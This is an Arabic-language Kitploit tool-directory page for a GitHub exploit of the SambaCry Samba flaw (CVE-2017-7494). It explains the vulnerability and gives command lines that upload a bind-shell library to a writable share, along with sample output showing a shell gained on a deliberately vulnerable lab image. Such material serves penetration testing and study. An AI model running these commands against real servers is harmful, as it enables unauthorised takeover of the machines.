Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/00mjk/exploit-cve-2017-7494
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

استغلال SambaCry (CVE-2017-7494)

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال SambaCry RCE لـ Samba 4.5.9

Samba هي إعادة تطبيق برمجية حرة لبروتوكول الشبكات SMB/CIFS. توفر Samba خدمات الملفات والطباعة لمختلف عملاء Microsoft Windows ويمكنها التكامل مع مجال Microsoft Windows Server، سواء كوحدة تحكم بالمجال (DC) أو كعضو في المجال. اعتبارًا من الإصدار 4، تدعم Active Directory ومجالات Microsoft Windows NT.

إصدار Samba 4.5.9 والإصدارات السابقة له معرضة لثغرة تنفيذ تعليمات برمجية عن بُعد تُسمى SambaCry. تسمح CVE-2017-7494 للمستخدمين المُوثقين عن بُعد برفع مكتبة مشتركة إلى مجلد مشترك قابل للكتابة، وتنفيذ هجمات تنفيذ تعليمات برمجية للسيطرة على الخوادم التي تستضيف خدمات Samba المعرضة للخطر.

إصدارات Samba 3.x بعد 3.5.0 و4.x قبل 4.4.14، و4.5.x قبل 4.5.10، و4.6.x قبل 4.6.4 لا تُقيد مسار الملف عند استخدام الأنابيب المسماة في Windows، مما يسمح للمستخدمين المُوثقين عن بُعد برفع مكتبة مشتركة إلى مجلد مشترك قابل للكتابة، وتنفيذ تعليمات برمجية عشوائية عبر أنبوب مسمى مصمم خصيصًا.

الاستغلال

استخدم poetry لإعداد البيئة لهذا الاستغلال

root@kitploit:~
pip3 install -r requirements.txt

بعد ذلك يمكنك تشغيله على النحو التالي:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

على سبيل المثال، إذا كنت تستخدم الصورة المعرضة للخطر من vulnerables/cve-2017-7494 وتريد تشغيل هذا الاستغلال ضدها:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

وستحصل على المخرجات التالية

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

الشكر والتقدير

الحمولة لهذا المشروع، إلى جانب الكود، كانت مستوحاة بشكل كبير من opsxcq/exploit-CVE-2017-7494.

تنزيل الأداة